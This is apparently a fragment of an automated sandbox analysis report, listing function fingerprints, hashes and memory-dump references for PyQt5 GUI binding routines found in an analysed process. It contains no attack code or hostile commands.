                                                                                                                                                                                                                                          • Opcode ID: 1f44c9c4ddae35bf89eec5e21602831fe8cd72cef12eaf7696e41fde9bf4a86c
                                                                                                                                                                                                                                          • Instruction ID: 09817939da1924fe13bf41c0a8a117010565eb2072dd7da9a666ce39642a92f4
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1f44c9c4ddae35bf89eec5e21602831fe8cd72cef12eaf7696e41fde9bf4a86c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7111876A08E46D1EB10DF10E8896A933A4FB44F84F914132DA8E03320EF3DE55AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCacheEnabled@Layout@@Text
                                                                                                                                                                                                                                          • String ID: QTextLayout$setCacheEnabled$setCacheEnabled(self, enable: bool)
                                                                                                                                                                                                                                          • API String ID: 2581981687-4022325882
                                                                                                                                                                                                                                          • Opcode ID: 320a5e41164041cd9cd13240c74d6f9e69abe62decff541baad352d4a6404729
                                                                                                                                                                                                                                          • Instruction ID: 5bcb648e667f323188ab0d3d86ce7d638c8d3e82c8ae8f2b8d54d7f6500a344d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 320a5e41164041cd9cd13240c74d6f9e69abe62decff541baad352d4a6404729
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04111876A18E46D1EB10CB20E8896A933A5FB44F84F914132DA9E03320EF3DE559C704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setResolution@Writer@@
                                                                                                                                                                                                                                          • String ID: QPdfWriter$setResolution$setResolution(self, resolution: int)
                                                                                                                                                                                                                                          • API String ID: 3182610714-59700000
                                                                                                                                                                                                                                          • Opcode ID: be405ba56195a025867bd3f41f99ed977da8e98cea7899a76c0716fc032902e3
                                                                                                                                                                                                                                          • Instruction ID: 2aa447831ad6a1788cf1a57c5f1f256796f92dc92c51602c515038a3e44cc277
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be405ba56195a025867bd3f41f99ed977da8e98cea7899a76c0716fc032902e3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1811E876A18E46D2EB10DF11E8896A933A5FB44F84F914132DA8E47320EF3DE55AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDesignDocument@@Metrics@Text
                                                                                                                                                                                                                                          • String ID: QTextDocument$setUseDesignMetrics$setUseDesignMetrics(self, b: bool)
                                                                                                                                                                                                                                          • API String ID: 209413394-1329671153
                                                                                                                                                                                                                                          • Opcode ID: 856a20fcc9714bb87b32b2cd06f7d5eb80f310fa7672d898a5a88e56af9819ce
                                                                                                                                                                                                                                          • Instruction ID: 1be4a8510afbfb7884500601ce503aead892ccdd49553b8238599db39118970c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 856a20fcc9714bb87b32b2cd06f7d5eb80f310fa7672d898a5a88e56af9819ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AE11EC76A18E46D1EB10DF21E8896A933A5FB48F94F914132DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setBlock@@TextVisible@
                                                                                                                                                                                                                                          • String ID: QTextBlock$setVisible$setVisible(self, visible: bool)
                                                                                                                                                                                                                                          • API String ID: 3250239804-1468847327
                                                                                                                                                                                                                                          • Opcode ID: af6e6c7b2ca2356ade5f08a8c612922e88ae6150640075015529104251acf341
                                                                                                                                                                                                                                          • Instruction ID: aff684b3e550caa1a8d0588733a6b8f1dc8f5ab2c34fe4f0a06def07d2a9ed12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: af6e6c7b2ca2356ade5f08a8c612922e88ae6150640075015529104251acf341
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2611E576A18E46D1EB10DF15E8896A933A5FB84F84F914032DA9E03320EF7DE56AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setIncluded@LeadingLine@@Text
                                                                                                                                                                                                                                          • String ID: QTextLine$setLeadingIncluded$setLeadingIncluded(self, included: bool)
                                                                                                                                                                                                                                          • API String ID: 3820243448-400583806
                                                                                                                                                                                                                                          • Opcode ID: e456543b3ad771402115c6e53a19c8e67eb61b04e1b059c2a9f4210f764cb7f3
                                                                                                                                                                                                                                          • Instruction ID: 3e03f28b296e6358272d362836beed7b08aec3b574092e2a9986592a5ccc0545
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e456543b3ad771402115c6e53a19c8e67eb61b04e1b059c2a9f4210f764cb7f3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7311E576A18E46D1EB10DF15E8896A933B5FB88BC4F914132DA9E03320EF3DE55AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setMinimumWidth@Window@@
                                                                                                                                                                                                                                          • String ID: QWindow$setMinimumWidth$setMinimumWidth(self, w: int)
                                                                                                                                                                                                                                          • API String ID: 1069717703-4103828744
                                                                                                                                                                                                                                          • Opcode ID: cf1221459b7be02671f2ed043f786d1e72af8e92878b518db1de0c5c1ae41351
                                                                                                                                                                                                                                          • Instruction ID: c4b0140f29757774c42d57d8e182f7af73a5b7611ae1f44acf1e5ee5ca4a10d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf1221459b7be02671f2ed043f786d1e72af8e92878b518db1de0c5c1ae41351
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E11FA36A18E46D1EB10DF15E8896A933B5FB44F94F914132DA9E03320EF7DE95AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCellCharColumnFormat@@Span@TableText
                                                                                                                                                                                                                                          • String ID: QTextCharFormat$setTableCellColumnSpan$setTableCellColumnSpan(self, atableCellColumnSpan: int)
                                                                                                                                                                                                                                          • API String ID: 2204635040-3990220477
                                                                                                                                                                                                                                          • Opcode ID: fb4029ce9c6d449d3488985c8eb3a405c1e5cc3fdeef137354643852dbeacbf7
                                                                                                                                                                                                                                          • Instruction ID: 0e54407a07b3c392a0c83552a97746c8d4ade4ff9bea873c1ec5f7e0b5830524
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb4029ce9c6d449d3488985c8eb3a405c1e5cc3fdeef137354643852dbeacbf7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE110636A18E46D1EB10CB14E8896A933B5FB44BC4F914032DA8E03320EF3DE95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setDecimals@DoubleValidator@@
                                                                                                                                                                                                                                          • String ID: QDoubleValidator$setDecimals$setDecimals(self, a0: int)
                                                                                                                                                                                                                                          • API String ID: 2819870426-3906973720
                                                                                                                                                                                                                                          • Opcode ID: db5592f7993a5e7b7484ce3043f71c349e3d924298b1ea0aeb9c2aab4e741a0e
                                                                                                                                                                                                                                          • Instruction ID: f984a7ec78a379309c69bb23c746d325ca70773d66b0476f5779a67e24f380b7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: db5592f7993a5e7b7484ce3043f71c349e3d924298b1ea0aeb9c2aab4e741a0e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B112A76A18E46D1EB10DF11E8896A933E5FB44F84F914132DA8E03320EF3DE56AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setFormat@@Samples@Surface
                                                                                                                                                                                                                                          • String ID: QSurfaceFormat$setSamples$setSamples(self, numSamples: int)
                                                                                                                                                                                                                                          • API String ID: 3471402103-3816964038
                                                                                                                                                                                                                                          • Opcode ID: 2c9586ae7107bc9e06712c8e674de121344f5702c3ae291cdc13402909c1d43b
                                                                                                                                                                                                                                          • Instruction ID: 810a6e7b396cb1e7c744cf7c2568341ff74fd8a23f9a715375e1d74d8bbbb1ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2c9586ae7107bc9e06712c8e674de121344f5702c3ae291cdc13402909c1d43b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D511FA76A18E46D1EB10DF15E8896A933A4FB44FC4F914132DA9E07320EF3DE95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?removeItem@List@@Text
                                                                                                                                                                                                                                          • String ID: QTextList$removeItem$removeItem(self, i: int)
                                                                                                                                                                                                                                          • API String ID: 3474726683-2227753569
                                                                                                                                                                                                                                          • Opcode ID: a7b8af425b1980b13ccf9a59897331bf1e0902af47b202c59232be8e25efd1c6
                                                                                                                                                                                                                                          • Instruction ID: d1ae3e12e94a38b66e2b2f5f136d842fa474660bd264320a090591e3a7074e12
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a7b8af425b1980b13ccf9a59897331bf1e0902af47b202c59232be8e25efd1c6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08111836A08E46D1EB10CF10E8896A933E5FB48F94F914132DA8E03320EF39E55AC704
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCount@Item@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$setRowCount$setRowCount(self, rows: int)
                                                                                                                                                                                                                                          • API String ID: 2627231148-3203994970
                                                                                                                                                                                                                                          • Opcode ID: a47ededf91e7943598f1f280a0322a140d2a2c1b9e6b4cd7ac9dce4dba99d4a8
                                                                                                                                                                                                                                          • Instruction ID: 455eb6a4fd4702918f28b28fcf1051917e620b3801e90ddf44066de5178f106a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a47ededf91e7943598f1f280a0322a140d2a2c1b9e6b4cd7ac9dce4dba99d4a8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6011EC76A18E46D1DB10DF15E8896A933A5FB44BC4F914132DA9E03320EF3DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setPen@@Width
                                                                                                                                                                                                                                          • String ID: QPen$setWidthF$setWidthF(self, width: float)
                                                                                                                                                                                                                                          • API String ID: 2145825199-1341275970
                                                                                                                                                                                                                                          • Opcode ID: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
                                                                                                                                                                                                                                          • Instruction ID: 76943d2cd43aa6b5f6a575e8cde8528dce767d1ff8d7af9aab22becdc315b94b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b7179538e9308bb4ce11c5954b3da8277bab5269a9b1c57973eaca5b148037b9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8211D376A08F46D1EB109F25E8896A933A4FB54B94F914132DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?setCurvePainterPathStroker@@Threshold@
                                                                                                                                                                                                                                          • String ID: QPainterPathStroker$setCurveThreshold$setCurveThreshold(self, threshold: float)
                                                                                                                                                                                                                                          • API String ID: 2833657433-2098193841
                                                                                                                                                                                                                                          • Opcode ID: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
                                                                                                                                                                                                                                          • Instruction ID: 4f1ae5efdb5ac7b846d3e2fecaf289dd86d1d3f47fa2605cad7cb6cec3ef1de3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33f9d4856d68fa5f8b4518d4d65c7244f03354b306cf9c2a75e627ebc6bba4fe
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EF11E576A08E46D1EB10DF25E8896A933A5FB44F84F914032DA9E03320EF3DE95AC744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?first@?$Point@@Point@@@@Vector@
                                                                                                                                                                                                                                          • String ID: QPolygon$first$first(self) -> QPoint
                                                                                                                                                                                                                                          • API String ID: 4117037871-3764477491
                                                                                                                                                                                                                                          • Opcode ID: e921906142175b0a3bf342772f0caa2674209a7a52eb99c7b8c5088127334529
                                                                                                                                                                                                                                          • Instruction ID: d829f319490c0f3d4fbe7c4938e9332c225fd47be400edbcdb5a2d4c0503f9f7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e921906142175b0a3bf342772f0caa2674209a7a52eb99c7b8c5088127334529
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 29012977A09A46C1EB108F61E8896A933A4FB44FD4F918032CA8E43320EF7CE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ?itemPrototype@QStandardItemModel@@QEBAPEBVQStandardItem@@XZ.QT5GUI ref: 00007FF89D955DDB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Standard$?itemItemItem@@Model@@Prototype@
                                                                                                                                                                                                                                          • String ID: QStandardItemModel$itemPrototype$itemPrototype(self) -> Optional[QStandardItem]
                                                                                                                                                                                                                                          • API String ID: 2431504200-192349141
                                                                                                                                                                                                                                          • Opcode ID: 0c2f3126719e8f61e52d7214e3c5eeae2912310bcfd5dffe6051162578c6a8a4
                                                                                                                                                                                                                                          • Instruction ID: 46bc95e768ba8c6e9cbaadd2912c924662f9003de9393d2fd177769e75541e06
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c2f3126719e8f61e52d7214e3c5eeae2912310bcfd5dffe6051162578c6a8a4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 31010536A08A4681EB108F21E8896A933A4FB44FD4F918032DA8E47320EF7CE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?intFormat@@Property@Text
                                                                                                                                                                                                                                          • String ID: QTextTableCellFormat$bottomBorderStyle$bottomBorderStyle(self) -> QTextFrameFormat.BorderStyle
                                                                                                                                                                                                                                          • API String ID: 3527681034-2438328319
                                                                                                                                                                                                                                          • Opcode ID: 003324f03a027d97c7923b5fd79380894a8dd8b4958d5cd97b8ae239b7c3b39b
                                                                                                                                                                                                                                          • Instruction ID: a1418da380da426cea29a49ae1495282f553dc4cdd8b4cfe8cc49e46608c464f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 003324f03a027d97c7923b5fd79380894a8dd8b4958d5cd97b8ae239b7c3b39b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D110536A08A4682EB108F61E8496A933E4FB44FD4F918032DA8E43320EF7CE559C384
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?parent@Item@@Standard
                                                                                                                                                                                                                                          • String ID: QStandardItem$parent$parent(self) -> Optional[QStandardItem]
                                                                                                                                                                                                                                          • API String ID: 3117110572-2488420150
                                                                                                                                                                                                                                          • Opcode ID: 79937be5acd4cdec6b87dfbcef0cd514f2b1a1b9d668aa68bc511471caba57d7
                                                                                                                                                                                                                                          • Instruction ID: 744a1453cd8e99cd06132beeead4aeef157d46d563a8dd502661e905dfe78b3a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 79937be5acd4cdec6b87dfbcef0cd514f2b1a1b9d668aa68bc511471caba57d7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 39011B36A08A4682EB108F55E8496A933A4FB44FD4F918032C98E43320EF7DE559C344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?painter@EnginePaintPainter@@State@@
                                                                                                                                                                                                                                          • String ID: QPaintEngineState$painter$painter(self) -> Optional[QPainter]
                                                                                                                                                                                                                                          • API String ID: 1966523716-3548787037
                                                                                                                                                                                                                                          • Opcode ID: 8afeef08cc00bc1161e40fb9d37443905d1db6d1eefc15825b162b4b5bd97bff
                                                                                                                                                                                                                                          • Instruction ID: 14ba0b9419467edd7aaf3498281d8be8cd5160cdd7fea63ea79e024a2f262508
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8afeef08cc00bc1161e40fb9d37443905d1db6d1eefc15825b162b4b5bd97bff
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2E01ED37A18A4681EB109F15E8496A933A4FB54FD4F918072CE9E43320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Point$?first@?$F@@@@Vector@
                                                                                                                                                                                                                                          • String ID: QPolygonF$first$first(self) -> QPointF
                                                                                                                                                                                                                                          • API String ID: 2594886209-3056036647
                                                                                                                                                                                                                                          • Opcode ID: 7a3b35c3a8bbd0901f5a3ea7221ce7359ee885096882996a9fd8529a72832553
                                                                                                                                                                                                                                          • Instruction ID: 88ffe52b599f4232f5de687953dbeb837fa1ba1620fb9bc4a72591231292e6ea
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a3b35c3a8bbd0901f5a3ea7221ce7359ee885096882996a9fd8529a72832553
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 80012937A08B46C1EB108F65E8896A933A4FB54FD4F918032CA8E43320EF7DE559C744
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742786406.00007FF89DB58000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742830626.00007FF89DB6C000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742865069.00007FF89DB6D000.00000008.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742896875.00007FF89DB6E000.00000004.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000005.00000002.2742928215.00007FF89DB70000.00000002.00000001.01000000.00000025.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Style@$?capPen@@Qt@@
                                                                                                                                                                                                                                          • String ID: QPen$capStyle$capStyle(self) -> Qt.PenCapStyle
                                                                                                                                                                                                                                          • API String ID: 3055056925-4262466542
                                                                                                                                                                                                                                          • Opcode ID: 9c50474535562aca60f64786c4b8aec093e73eaed01a0293be1dfae6e3f5b507
                                                                                                                                                                                                                                          • Instruction ID: 7cfaa80d26fcacc08787bae97b09c335a7993b364de47b1c35f969e442ca3abd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9c50474535562aca60f64786c4b8aec093e73eaed01a0293be1dfae6e3f5b507
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 18012D36A08A46C1EB10DF55E8496A933A4FB54FD4F918032C99E43330EF7CE59AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Touch$?maximumDevice@@Points@
                                                                                                                                                                                                                                          • String ID: QPageLayout$orientation$orientation(self) -> QPageLayout.Orientation
                                                                                                                                                                                                                                          • API String ID: 2297492979-2656156900
                                                                                                                                                                                                                                          • Opcode ID: a1ab2a2114099a1b95895cab7463e574abd8108494cf44a8bc6090f24cac1ae2
                                                                                                                                                                                                                                          • Instruction ID: c05b216f525de125d8bf9db4166709d980f741f6d55ff485571fb866b2f9805e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1ab2a2114099a1b95895cab7463e574abd8108494cf44a8bc6090f24cac1ae2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9601D736A08A46C1EB109F65E8496A933A4FB54FD4F914072DA8E47320EF7DF55AC344
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000005.00000002.2742060685.00007FF89D931000.00000020.00000001.01000000.00000025.sdmp, Offset: 00007FF89D930000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff89d930000_check.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ?clearFormat@@Property@Text
                                                                                                                                                                                                                                          • String ID: QTextFormat$clearBackground$clearBackground(self)
                                                                                                                                                                                                                                          • API String ID: 55445122-3087451625
                                                                                                                                                                                                                                          • Opcode ID: 274df547a1825b7ddfb6c487d78f0caf85213a4b21e9e1c727d660c06faae4c4
